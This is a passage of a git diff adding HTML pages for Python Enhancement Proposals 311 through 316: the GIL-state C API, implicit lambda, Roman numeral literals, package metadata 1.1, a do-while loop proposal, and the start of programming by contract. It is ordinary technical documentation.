The intent is that assuming Python has correctly been initialized, +an extension author be able to use a small, well-defined “prologue +dance”, at any time and on any thread, which will ensure Python +is ready to be used on that thread. After the extension has +finished with Python, it must also perform an “epilogue dance” to +release any resources previously acquired. Ideally, these dances +can be expressed in a single line.

+

Specifically, the following new APIs are proposed:

+
/* Ensure that the current thread is ready to call the Python
+   C API, regardless of the current state of Python, or of its
+   thread lock.  This may be called as many times as desired
+   by a thread so long as each call is matched with a call to
+   PyGILState_Release().  In general, other thread-state APIs may
+   be used between _Ensure() and _Release() calls, so long as the
+   thread-state is restored to its previous state before the Release().
+   For example, normal use of the Py_BEGIN_ALLOW_THREADS/
+   Py_END_ALLOW_THREADS macros are acceptable.
+
+   The return value is an opaque "handle" to the thread state when
+   PyGILState_Acquire() was called, and must be passed to
+   PyGILState_Release() to ensure Python is left in the same state. Even
+   though recursive calls are allowed, these handles can *not* be
+   shared - each unique call to PyGILState_Ensure must save the handle
+   for its call to PyGILState_Release.
+
+   When the function returns, the current thread will hold the GIL.
+
+   Failure is a fatal error.
+*/
+PyAPI_FUNC(PyGILState_STATE) PyGILState_Ensure(void);
+
+/* Release any resources previously acquired.  After this call, Python's
+   state will be the same as it was prior to the corresponding
+   PyGILState_Acquire call (but generally this state will be unknown to
+   the caller, hence the use of the GILState API.)
+
+   Every call to PyGILState_Ensure must be matched by a call to
+   PyGILState_Release on the same thread.
+*/
+PyAPI_FUNC(void) PyGILState_Release(PyGILState_STATE);
+
+
+

Common usage will be:

+
void SomeCFunction(void)
+{
+    /* ensure we hold the lock */
+    PyGILState_STATE state = PyGILState_Ensure();
+    /* Use the Python API */
+    ...
+    /* Restore the state of Python */
+    PyGILState_Release(state);
+}
+
+
+
+
+

Design and Implementation

+

The general operation of PyGILState_Ensure() will be:

+
    +
  • assert Python is initialized.
  • +
  • Get a PyThreadState for the current thread, creating and saving +if necessary.
  • +
  • remember the current state of the lock (owned/not owned)
  • +
  • If the current state does not own the GIL, acquire it.
  • +
  • Increment a counter for how many calls to PyGILState_Ensure have been +made on the current thread.
  • +
  • return
  • +
+

The general operation of PyGILState_Release() will be:

+
    +
  • assert our thread currently holds the lock.
  • +
  • If old state indicates lock was previously unlocked, release GIL.
  • +
  • Decrement the PyGILState_Ensure counter for the thread.
  • +
  • If counter == 0:
      +
    • release and delete the PyThreadState.
    • +
    • forget the ThreadState as being owned by the thread.
    • +
    +
  • +
  • return
  • +
+

It is assumed that it is an error if two discrete PyThreadStates +are used for a single thread. Comments in pystate.h (“State +unique per thread”) support this view, although it is never +directly stated. Thus, this will require some implementation of +Thread Local Storage. Fortunately, a platform independent +implementation of Thread Local Storage already exists in the +Python source tree, in the SGI threading port. This code will be +integrated into the platform independent Python core, but in such +a way that platforms can provide a more optimal implementation if +desired.

+
+
+

Implementation

+

An implementation of this proposal can be found at +https://bugs.python.org/issue684256

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0311.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0312/index.html b/pep-0312/index.html new file mode 100644 index 00000000000..96cda61c787 --- /dev/null +++ b/pep-0312/index.html @@ -0,0 +1,309 @@ + + + + + + + + PEP 312 – Simple Implicit Lambda | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 312 – Simple Implicit Lambda

+
+
Author:
+
Roman Suzi <rnd at onego.ru>, Alex Martelli <aleaxit at gmail.com>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
11-Feb-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes to make argumentless lambda keyword optional in +some cases where it is not grammatically ambiguous.

+
+
+

Deferral

+

The BDFL hates the unary colon syntax. This PEP needs to go back +to the drawing board and find a more Pythonic syntax (perhaps an +alternative unary operator). See python-dev discussion on +17 June 2005 [1].

+

Also, it is probably a good idea to eliminate the alternative +propositions which have no chance at all. The examples section +is good and highlights the readability improvements. It would +carry more weight with additional examples and with real-world +referents (instead of the abstracted dummy calls to :A and :B).

+
+
+

Motivation

+

Lambdas are useful for defining anonymous functions, e.g. for use +as callbacks or (pseudo)-lazy evaluation schemes. Often, lambdas +are not used when they would be appropriate, just because the +keyword “lambda” makes code look complex. Omitting lambda in some +special cases is possible, with small and backwards compatible +changes to the grammar, and provides a cheap cure against such +“lambdaphobia”.

+
+
+

Rationale

+

Sometimes people do not use lambdas because they fear to introduce +a term with a theory behind it. This proposal makes introducing +argumentless lambdas easier, by omitting the “lambda” keyword. +itself. Implementation can be done simply changing grammar so it +lets the “lambda” keyword be implied in a few well-known cases. +In particular, adding surrounding brackets lets you specify +nullary lambda anywhere.

+
+
+

Syntax

+

An argumentless “lambda” keyword can be omitted in the following +cases:

+
    +
  • immediately after “=” in named parameter assignment or default +value assignment;
  • +
  • immediately after “(” in any expression;
  • +
  • immediately after a “,” in a function argument list;
  • +
  • immediately after a “:” in a dictionary literal; (not +implemented)
  • +
  • in an assignment statement; (not implemented)
  • +
+
+
+

Examples of Use

+
    +
  1. Inline if:
    def ifelse(cond, true_part, false_part):
    +    if cond:
    +        return true_part()
    +    else:
    +        return false_part()
    +
    +# old syntax:
    +print ifelse(a < b, lambda:A, lambda:B)
    +
    +# new syntax:
    +print ifelse(a < b, :A, :B)
    +
    +# parts A and B may require extensive processing, as in:
    +print ifelse(a < b, :ext_proc1(A), :ext_proc2(B))
    +
    +
    +
  2. +
  3. Locking:
    def with(alock, acallable):
    +    alock.acquire()
    +    try:
    +        acallable()
    +    finally:
    +        alock.release()
    +
    +with(mylock, :x(y(), 23, z(), 'foo'))
    +
    +
    +
  4. +
+
+
+

Implementation

+

Implementation requires some tweaking of the Grammar/Grammar file +in the Python sources, and some adjustment of +Modules/parsermodule.c to make syntactic and pragmatic changes.

+

(Some grammar/parser guru is needed to make a full +implementation.)

+

Here are the changes needed to Grammar to allow implicit lambda:

+
varargslist: (fpdef ['=' imptest] ',')* ('*' NAME [',' '**'
+NAME] | '**' NAME) | fpdef ['=' imptest] (',' fpdef ['='
+imptest])* [',']
+
+imptest: test | implambdef
+
+atom: '(' [imptestlist] ')' | '[' [listmaker] ']' |
+'{' [dictmaker] '}' | '`' testlist1 '`' | NAME | NUMBER | STRING+
+
+implambdef: ':' test
+
+imptestlist: imptest (',' imptest)* [',']
+
+argument: [test '='] imptest
+
+
+

Three new non-terminals are needed: imptest for the place where +implicit lambda may occur, implambdef for the implicit lambda +definition itself, imptestlist for a place where imptest’s may +occur.

+

This implementation is not complete. First, because some files in +Parser module need to be updated. Second, some additional places +aren’t implemented, see Syntax section above.

+
+
+

Discussion

+

This feature is not a high-visibility one (the only novel part is +the absence of lambda). The feature is intended to make null-ary +lambdas more appealing syntactically, to provide lazy evaluation +of expressions in some simple cases. This proposal is not targeted +at more advanced cases (demanding arguments for the lambda).

+

There is an alternative proposition for implicit lambda: implicit +lambda with unused arguments. In this case the function defined by +such lambda can accept any parameters, i.e. be equivalent to: +lambda *args: expr. This form would be more powerful. Grep in the +standard library revealed that such lambdas are indeed in use.

+

One more extension can provide a way to have a list of parameters +passed to a function defined by implicit lambda. However, such +parameters need some special name to be accessed and are unlikely +to be included in the language. Possible local names for such +parameters are: _, __args__, __. For example:

+
reduce(:_[0] + _[1], [1,2,3], 0)
+reduce(:__[0] + __[1], [1,2,3], 0)
+reduce(:__args__[0] + __args__[1], [1,2,3], 0)
+
+
+

These forms do not look very nice, and in the PEP author’s opinion +do not justify the removal of the lambda keyword in such cases.

+
+
+

Credits

+

The idea of dropping lambda was first coined by Paul Rubin at 08 +Feb 2003 16:39:30 -0800 in comp.lang.python while discussing the +thread “For review: PEP 308 - If-then-else expression” [2].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0312.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0313/index.html b/pep-0313/index.html new file mode 100644 index 00000000000..4105c5c02b8 --- /dev/null +++ b/pep-0313/index.html @@ -0,0 +1,221 @@ + + + + + + + + PEP 313 – Adding Roman Numeral Literals to Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 313 – Adding Roman Numeral Literals to Python

+
+
Author:
+
Mike Meyer <mwm at mired.org>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
01-Apr-2003
+
Python-Version:
+
2.4
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP (also known as PEP CCCXIII) proposes adding Roman +numerals as a literal type. It also proposes the new built-in +function “roman”, which converts an object to an integer, then +converts the integer to a string that is the Roman numeral literal +equivalent to the integer.

+
+
+

BDFL Pronouncement

+

This PEP is rejected. While the majority of Python users deemed this +to be a nice-to-have feature, the community was unable to reach a +consensus on whether nine should be represented as IX, the modern +form, or VIIII, the classic form. Likewise, no agreement was +reached on whether MXM or MCMXC would be considered a well-formed +representation of 1990. A vocal minority of users has also requested +support for lower-cased numerals for use in (i) powerpoint slides, +(ii) academic work, and (iii) Perl documentation.

+
+
+

Rationale

+

Roman numerals are used in a number of areas, and adding them to +Python as literals would make computations in those areas easier. +For instance, Super Bowls are counted with Roman numerals, and many +older movies have copyright dates in Roman numerals. Further, +LISP provides a Roman numerals literal package, so adding Roman +numerals to Python will help ease the LISP-envy sometimes seen in +comp.lang.python. Besides, the author thinks this is the easiest +way to get his name on a PEP.

+
+
+

Syntax for Roman literals

+

Roman numeral literals will consist of the characters M, D, C, L, +X, V and I, and only those characters. They must be in upper +case, and represent an integer with the following rules:

+
    +
  1. Except as noted below, they must appear in the order M, D, C, +L, X, V then I. Each occurrence of each character adds 1000, 500, +100, 50, 10, 5 and 1 to the value of the literal, respectively.
  2. +
  3. Only one D, V or L may appear in any given literal.
  4. +
  5. At most three each of Is, Xs and Cs may appear consecutively +in any given literal.
  6. +
  7. A single I may appear immediately to the left of the single V, +followed by no Is, and adds 4 to the value of the literal.
  8. +
  9. A single I may likewise appear before the last X, followed by +no Is or Vs, and adds 9 to the value.
  10. +
  11. X is to L and C as I is to V and X, except the values are 40 +and 90, respectively.
  12. +
  13. C is to D and M as I is to V and X, except the values are 400 +and 900, respectively.
  14. +
+

Any literal composed entirely of M, D, C, L, X, V and I characters +that does not follow this format will raise a syntax error, +because explicit is better than implicit.

+
+
+

Built-In “roman” Function

+

The new built-in function “roman” will aide the translation from +integers to Roman numeral literals. It will accept a single +object as an argument, and return a string containing the literal +of the same value. If the argument is not an integer or a +rational (see PEP 239) it will passed through the existing +built-in “int” to obtain the value. This may cause a loss of +information if the object was a float. If the object is a +rational, then the result will be formatted as a rational literal +(see PEP 240) with the integers in the string being Roman +numeral literals.

+
+
+

Compatibility Issues

+

No new keywords are introduced by this proposal. Programs that +use variable names that are all upper case and contain only the +characters M, D, C, L, X, V and I will be affected by the new +literals. These programs will now have syntax errors when those +variables are assigned, and either syntax errors or subtle bugs +when those variables are referenced in expressions. Since such +variable names violate PEP 8, the code is already broken, it +just wasn’t generating exceptions. This proposal corrects that +oversight in the language.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0313.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0314/index.html b/pep-0314/index.html new file mode 100644 index 00000000000..f506023c45e --- /dev/null +++ b/pep-0314/index.html @@ -0,0 +1,468 @@ + + + + + + + + PEP 314 – Metadata for Python Software Packages 1.1 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 314 – Metadata for Python Software Packages 1.1

+
+
Author:
+
A.M. Kuchling, Richard Jones
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
12-Apr-2003
+
Python-Version:
+
2.5
+
Post-History:
+
29-Apr-2003
+
Replaces:
+
241
+
Superseded-By:
+
345
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Introduction

+

This PEP describes a mechanism for adding metadata to Python +packages. It includes specifics of the field names, and their +semantics and usage.

+

This document specifies version 1.1 of the metadata format. +Version 1.0 is specified in PEP 241.

+
+
+

Including Metadata in Packages

+

The Distutils sdist command will extract the metadata fields +from the arguments and write them to a file in the generated +zipfile or tarball. This file will be named PKG-INFO and will be +placed in the top directory of the source distribution (where the +README, INSTALL, and other files usually go).

+

Developers may not provide their own PKG-INFO file. The sdist +command will, if it detects an existing PKG-INFO file, terminate +with an appropriate error message. This should prevent confusion +caused by the PKG-INFO and setup.py files being out of sync.

+

The PKG-INFO file format is a single set of RFC 822 headers +parseable by the rfc822.py module. The field names listed in the +following section are used as the header names.

+
+
+

Fields

+

This section specifies the names and semantics of each of the +supported metadata fields.

+

Fields marked with “(Multiple use)” may be specified multiple +times in a single PKG-INFO file. Other fields may only occur +once in a PKG-INFO file. Fields marked with “(optional)” are +not required to appear in a valid PKG-INFO file; all other +fields must be present.

+
+

Metadata-Version

+

Version of the file format; currently “1.0” and “1.1” are the +only legal values here.

+

Example:

+
Metadata-Version: 1.1
+
+
+
+
+

Name

+

The name of the package.

+

Example:

+
Name: BeagleVote
+
+
+
+
+

Version

+

A string containing the package’s version number. This +field should be parseable by one of the Version classes +(StrictVersion or LooseVersion) in the distutils.version +module.

+

Example:

+
Version: 1.0a2
+
+
+
+
+

Platform (multiple use)

+

A comma-separated list of platform specifications, summarizing +the operating systems supported by the package which are not +listed in the “Operating System” Trove classifiers. See +“Classifier” below.

+

Example:

+
Platform: ObscureUnix, RareDOS
+
+
+
+
+

Supported-Platform (multiple use)

+

Binary distributions containing a PKG-INFO file will use the +Supported-Platform field in their metadata to specify the OS and +CPU for which the binary package was compiled. The semantics of +the Supported-Platform field are not specified in this PEP.

+

Example:

+
Supported-Platform: RedHat 7.2
+Supported-Platform: i386-win32-2791
+
+
+
+
+

Summary

+

A one-line summary of what the package does.

+

Example:

+
Summary: A module for collecting votes from beagles.
+
+
+
+
+

Description (optional)

+

A longer description of the package that can run to several +paragraphs. Software that deals with metadata should not assume +any maximum size for this field, though people shouldn’t include +their instruction manual as the description.

+

The contents of this field can be written using reStructuredText +markup [1]. For programs that work with the metadata, +supporting markup is optional; programs can also display the +contents of the field as-is. This means that authors should be +conservative in the markup they use.

+

Example:

+
Description: This module collects votes from beagles
+             in order to determine their electoral wishes.
+             Do *not* try to use this module with basset hounds;
+             it makes them grumpy.
+
+
+
+
+

Keywords (optional)

+

A list of additional keywords to be used to assist searching +for the package in a larger catalog.

+

Example:

+
Keywords: dog puppy voting election
+
+
+
+
+

Home-page (optional)

+

A string containing the URL for the package’s home page.

+

Example:

+
Home-page: http://www.example.com/~cschultz/bvote/
+
+
+
+
+

Download-URL

+

A string containing the URL from which this version of the package +can be downloaded. (This means that the URL can’t be something like +“…/package-latest.tgz”, but instead must be “../package-0.45.tgz”.)

+
+
+

Author (optional)

+

A string containing the author’s name at a minimum; additional +contact information may be provided.

+

Example:

+
Author: C. Schultz, Universal Features Syndicate,
+        Los Angeles, CA <cschultz@peanuts.example.com>
+
+
+
+
+

Author-email

+

A string containing the author’s e-mail address. It can contain +a name and e-mail address in the legal forms for a RFC 822 +‘From:’ header. It’s not optional because cataloging systems +can use the e-mail portion of this field as a unique key +representing the author. A catalog might provide authors the +ability to store their GPG key, personal home page, and other +additional metadata about the author, and optionally the +ability to associate several e-mail addresses with the same +person. Author-related metadata fields are not covered by this +PEP.

+

Example:

+
Author-email: "C. Schultz" <cschultz@example.com>
+
+
+
+
+

License

+

Text indicating the license covering the package where the license +is not a selection from the “License” Trove classifiers. See +“Classifier” below.

+

Example:

+
License: This software may only be obtained by sending the
+         author a postcard, and then the user promises not
+         to redistribute it.
+
+
+
+
+

Classifier (multiple use)

+

Each entry is a string giving a single classification value +for the package. Classifiers are described in PEP 301.

+

Examples:

+
Classifier: Development Status :: 4 - Beta
+Classifier: Environment :: Console (Text Based)
+
+
+
+
+

Requires (multiple use)

+

Each entry contains a string describing some other module or +package required by this package.

+

The format of a requirement string is identical to that of a +module or package name usable with the ‘import’ statement, +optionally followed by a version declaration within parentheses.

+

A version declaration is a series of conditional operators and +version numbers, separated by commas. Conditional operators +must be one of “<”, “>”, “<=”, “>=”, “==”, and “!=”. Version +numbers must be in the format accepted by the +distutils.version.StrictVersion class: two or three +dot-separated numeric components, with an optional “pre-release” +tag on the end consisting of the letter ‘a’ or ‘b’ followed by a +number. Example version numbers are “1.0”, “2.3a2”, “1.3.99”,

+

Any number of conditional operators can be specified, e.g. +the string “>1.0, !=1.3.4, <2.0” is a legal version declaration.

+

All of the following are possible requirement strings: “rfc822”, +“zlib (>=1.1.4)”, “zope”.

+

There’s no canonical list of what strings should be used; the +Python community is left to choose its own standards.

+

Example:

+
Requires: re
+Requires: sys
+Requires: zlib
+Requires: xml.parsers.expat (>1.0)
+Requires: psycopg
+
+
+
+
+

Provides (multiple use)

+

Each entry contains a string describing a package or module that +will be provided by this package once it is installed. These +strings should match the ones used in Requirements fields. A +version declaration may be supplied (without a comparison +operator); the package’s version number will be implied if none +is specified.

+

Example:

+
Provides: xml
+Provides: xml.utils
+Provides: xml.utils.iso8601
+Provides: xml.dom
+Provides: xmltools (1.3)
+
+
+
+
+

Obsoletes (multiple use)

+

Each entry contains a string describing a package or module +that this package renders obsolete, meaning that the two packages +should not be installed at the same time. Version declarations +can be supplied.

+

The most common use of this field will be in case a package name +changes, e.g. Gorgon 2.3 gets subsumed into Torqued Python 1.0. +When you install Torqued Python, the Gorgon package should be +removed.

+

Example:

+
Obsoletes: Gorgon
+
+
+
+
+
+

Summary of Differences From PEP 241

+
    +
  • Metadata-Version is now 1.1.
  • +
  • Added the Classifiers field from PEP 301.
  • +
  • The License and Platform files should now only be used if the +platform or license can’t be handled by an appropriate Classifier +value.
  • +
  • Added fields: Download-URL, Requires, Provides, Obsoletes.
  • +
+
+
+

Open issues

+

None.

+
+
+

Acknowledgements

+

None.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0314.rst

+

Last modified: 2024-10-06 16:27:00 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0315/index.html b/pep-0315/index.html new file mode 100644 index 00000000000..0cc4d42e033 --- /dev/null +++ b/pep-0315/index.html @@ -0,0 +1,279 @@ + + + + + + + + PEP 315 – Enhanced While Loop | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 315 – Enhanced While Loop

+
+
Author:
+
Raymond Hettinger <python at rcn.com>, W Isaac Carroll <icarroll at pobox.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
25-Apr-2003
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes adding an optional “do” clause to the beginning +of the while loop to make loop code clearer and reduce errors +caused by code duplication.

+
+
+

Notice

+

Rejected; see [1].

+

This PEP has been deferred since 2006; see [2].

+

Subsequent efforts to revive the PEP in April 2009 did not +meet with success because no syntax emerged that could +compete with the following form:

+
while True:
+    <setup code>
+    if not <condition>:
+        break
+    <loop body>
+
+
+

A syntax alternative to the one proposed in the PEP was found for +a basic do-while loop but it gained little support because the +condition was at the top:

+
do ... while <cond>:
+    <loop body>
+
+
+

Users of the language are advised to use the while-True form with +an inner if-break when a do-while loop would have been appropriate.

+
+
+

Motivation

+

It is often necessary for some code to be executed before each +evaluation of the while loop condition. This code is often +duplicated outside the loop, as setup code that executes once +before entering the loop:

+
<setup code>
+while <condition>:
+    <loop body>
+    <setup code>
+
+
+

The problem is that duplicated code can be a source of errors if +one instance is changed but the other is not. Also, the purpose +of the second instance of the setup code is not clear because it +comes at the end of the loop.

+

It is possible to prevent code duplication by moving the loop +condition into a helper function, or an if statement in the loop +body. However, separating the loop condition from the while +keyword makes the behavior of the loop less clear:

+
def helper(args):
+    <setup code>
+    return <condition>
+
+while helper(args):
+    <loop body>
+
+
+

This last form has the additional drawback of requiring the loop’s +else clause to be added to the body of the if statement, further +obscuring the loop’s behavior:

+
while True:
+    <setup code>
+    if not <condition>: break
+    <loop body>
+
+
+

This PEP proposes to solve these problems by adding an optional +clause to the while loop, which allows the setup code to be +expressed in a natural way:

+
do:
+    <setup code>
+while <condition>:
+    <loop body>
+
+
+

This keeps the loop condition with the while keyword where it +belongs, and does not require code to be duplicated.

+
+
+

Syntax

+

The syntax of the while statement

+
while_stmt : "while" expression ":" suite
+         ["else" ":" suite]
+
+
+

is extended as follows:

+
while_stmt : ["do" ":" suite]
+            "while" expression ":" suite
+            ["else" ":" suite]
+
+
+
+
+

Semantics of break and continue

+

In the do-while loop the break statement will behave the same as +in the standard while loop: It will immediately terminate the loop +without evaluating the loop condition or executing the else +clause.

+

A continue statement in the do-while loop jumps to the while +condition check.

+

In general, when the while suite is empty (a pass statement), +the do-while loop and break and continue statements should match +the semantics of do-while in other languages.

+

Likewise, when the do suite is empty, the do-while loop and +break and continue statements should match behavior found +in regular while loops.

+
+
+

Future Statement

+

Because of the new keyword “do”, the statement

+
from __future__ import do_while
+
+
+

will initially be required to use the do-while form.

+
+
+

Implementation

+

The first implementation of this PEP can compile the do-while loop +as an infinite loop with a test that exits the loop.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0315.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0316/index.html b/pep-0316/index.html new file mode 100644 index 00000000000..0f19657a8aa --- /dev/null +++ b/pep-0316/index.html @@ -0,0 +1,528 @@ + + + + + + + + PEP 316 – Programming by Contract for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 316 – Programming by Contract for Python

+
+
Author:
+
Terence Way <terry at wayforward.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
02-May-2003
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This submission describes programming by contract for Python. +Eiffel’s Design By Contract(tm) is perhaps the most popular use of +programming contracts [2].

+

Programming contracts extends the language to include invariant +expressions for classes and modules, and pre- and post-condition +expressions for functions and methods.

+

These expressions (contracts) are similar to assertions: they must be +true or the program is stopped, and run-time checking of the contracts +is typically only enabled while debugging. Contracts are higher-level +than straight assertions and are typically included in documentation.

+
+
+

Motivation

+

Python already has assertions, why add extra stuff to the language to +support something like contracts? The two best reasons are 1) better, +more accurate documentation, and 2) easier testing.

+

Complex modules and classes never seem to be documented quite right. +The documentation provided may be enough to convince a programmer to +use a particular module or class over another, but the programmer +almost always has to read the source code when the real debugging +starts.

+

Contracts extend the excellent example provided by the doctest +module [4]. Documentation is readable by programmers, yet has +executable tests embedded in it.

+

Testing code with contracts is easier too. Comprehensive contracts +are equivalent to unit tests [8]. Tests exercise the full range of +pre-conditions, and fail if the post-conditions are triggered. +Theoretically, a correctly specified function can be tested completely +randomly.

+

So why add this to the language? Why not have several different +implementations, or let programmers implement their own assertions? +The answer is the behavior of contracts under inheritance.

+

Suppose Alice and Bob use different assertions packages. If Alice +produces a class library protected by assertions, Bob cannot derive +classes from Alice’s library and expect proper checking of +post-conditions and invariants. If they both use the same assertions +package, then Bob can override Alice’s methods yet still test against +Alice’s contract assertions. The natural place to find this +assertions system is in the language’s run-time library.

+
+
+

Specification

+

The docstring of any module or class can include invariant contracts +marked off with a line that starts with the keyword inv followed +by a colon (:). Whitespace at the start of the line and around the +colon is ignored. The colon is either immediately followed by a +single expression on the same line, or by a series of expressions on +following lines indented past the inv keyword. The normal Python +rules about implicit and explicit line continuations are followed +here. Any number of invariant contracts can be in a docstring.

+

Some examples:

+
# state enumeration
+START, CONNECTING, CONNECTED, CLOSING, CLOSED = range(5)
+
+class conn:
+
+    """A network connection
+
+    inv: self.state in [START, CLOSED,       # closed states
+                        CONNECTING, CLOSING, # transition states
+                        CONNECTED]
+
+    inv: 0 <= self.seqno < 256
+    """
+
+class circbuf:
+
+    """A circular buffer.
+
+    inv:
+        # there can be from 0 to max items on the buffer
+        0 <= self.len <= len(self.buf)
+
+        # g is a valid index into buf
+        0 <= self.g < len(self.buf)
+
+        # p is also a valid index into buf
+        0 <= self.p < len(self.buf)
+
+        # there are len items between get and put
+        (self.p - self.g) % len(self.buf) == \
+              self.len % len(self.buf)
+    """
+
+
+

Module invariants must be true after the module is loaded, and at the +entry and exit of every public function within the module.

+

Class invariants must be true after the __init__ function returns, +at the entry of the __del__ function, and at the entry and exit of +every other public method of the class. Class invariants must use the +self variable to access instance variables.

+

A method or function is public if its name doesn’t start with an +underscore (_), unless it starts and ends with ‘__’ (two underscores).

+

The docstring of any function or method can have pre-conditions +documented with the keyword pre following the same rules above. +Post-conditions are documented with the keyword post optionally +followed by a list of variables. The variables are in the same scope +as the body of the function or method. This list declares the +variables that the function/method is allowed to modify.

+

An example:

+
class circbuf:
+
+    def __init__(self, leng):
+        """Construct an empty circular buffer.
+
+        pre: leng > 0
+        post[self]:
+            self.is_empty()
+            len(self.buf) == leng
+        """
+
+
+

A double-colon (::) can be used instead of a single colon (:) to +support docstrings written using reStructuredText [7]. For +example, the following two docstrings describe the same contract:

+
"""pre: leng > 0"""
+"""pre:: leng > 0"""
+
+
+

Expressions in pre- and post-conditions are defined in the module +namespace – they have access to nearly all the variables that the +function can access, except closure variables.

+

The contract expressions in post-conditions have access to two +additional variables: __old__ which is filled with shallow copies +of values declared in the variable list immediately following the post +keyword, and __return__ which is bound to the return value of the +function or method.

+

An example:

+
class circbuf:
+
+    def get(self):
+        """Pull an entry from a non-empty circular buffer.
+
+        pre: not self.is_empty()
+        post[self.g, self.len]:
+            __return__ == self.buf[__old__.self.g]
+            self.len == __old__.self.len - 1
+        """
+
+
+

All contract expressions have access to some additional convenience +functions. To make evaluating the truth of sequences easier, two +functions forall and exists are defined as:

+
def forall(a, fn = bool):
+    """Return True only if all elements in a are true.
+
+    >>> forall([])
+    1
+    >>> even = lambda x: x % 2 == 0
+    >>> forall([2, 4, 6, 8], even)
+    1
+    >>> forall('this is a test'.split(), lambda x: len(x) == 4)
+    0
+    """
+
+def exists(a, fn = bool):
+    """Returns True if there is at least one true value in a.
+
+    >>> exists([])
+    0
+    >>> exists('this is a test'.split(), lambda x: len(x) == 4)
+    1
+    """
+
+
+

An example:

+
def sort(a):
+    """Sort a list.
+
+    pre: isinstance(a, type(list))
+    post[a]:
+        # array size is unchanged
+        len(a) == len(__old__.a)
+
+        # array is ordered
+        forall([a[i] >= a[i-1] for i in range(1, len(a))])
+
+        # all the old elements are still in the array
+        forall(__old__.a, lambda e: __old__.a.count(e) == a.count(e))
+    """
+
+
+

To make evaluating conditions easier, the function implies is +defined. With two arguments, this is similar to the logical implies +(=>) operator. With three arguments, this is similar to C’s +conditional expression (x?a:b). This is defined as:

+
implies(False, a) => True
+implies(True, a) => a
+implies(False, a, b) => b
+implies(True, a, b) => a
+
+
+

On entry to a function, the function’s pre-conditions are checked. An +assertion error is raised if any pre-condition is false. If the +function is public, then the class or module’s invariants are also +checked. Copies of variables declared in the post are saved, the +function is called, and if the function exits without raising an +exception, the post-conditions are checked.

+
+

Exceptions

+

Class/module invariants are checked even if a function or method exits +by signalling an exception (post-conditions are not).

+

All failed contracts raise exceptions which are subclasses of the +ContractViolationError exception, which is in turn a subclass of the +AssertionError exception. Failed pre-conditions raise a +PreconditionViolationError exception. Failed post-conditions raise +a PostconditionViolationError exception, and failed invariants raise +a InvariantViolationError exception.

+

The class hierarchy:

+
AssertionError
+    ContractViolationError
+        PreconditionViolationError
+        PostconditionViolationError
+        InvariantViolationError
+        InvalidPreconditionError
+
+
+

The InvalidPreconditionError is raised when pre-conditions are +illegally strengthened, see the next section on Inheritance.

+

Example:

+
try:
+    some_func()
+except contract.PreconditionViolationError:
+    # failed pre-condition, ok
+    pass
+
+
+
+
+

Inheritance

+

A class’s invariants include all the invariants for all super-classes +(class invariants are ANDed with super-class invariants). These +invariants are checked in method-resolution order.

+

A method’s post-conditions also include all overridden post-conditions +(method post-conditions are ANDed with all overridden method +post-conditions).

+

An overridden method’s pre-conditions can be ignored if the overriding +method’s pre-conditions are met. However, if the overriding method’s +pre-conditions fail, all of the overridden method’s pre-conditions +must also fail. If not, a separate exception is raised, the +InvalidPreconditionError. This supports weakening pre-conditions.

+

A somewhat contrived example:

+
class SimpleMailClient:
+
+    def send(self, msg, dest):
+        """Sends a message to a destination:
+
+        pre: self.is_open() # we must have an open connection
+        """
+
+    def recv(self):
+        """Gets the next unread mail message.
+
+        Returns None if no message is available.
+
+        pre: self.is_open() # we must have an open connection
+        post: __return__ is None or isinstance(__return__, Message)
+        """
+
+ class ComplexMailClient(SimpleMailClient):
+    def send(self, msg, dest):
+        """Sends a message to a destination.
+
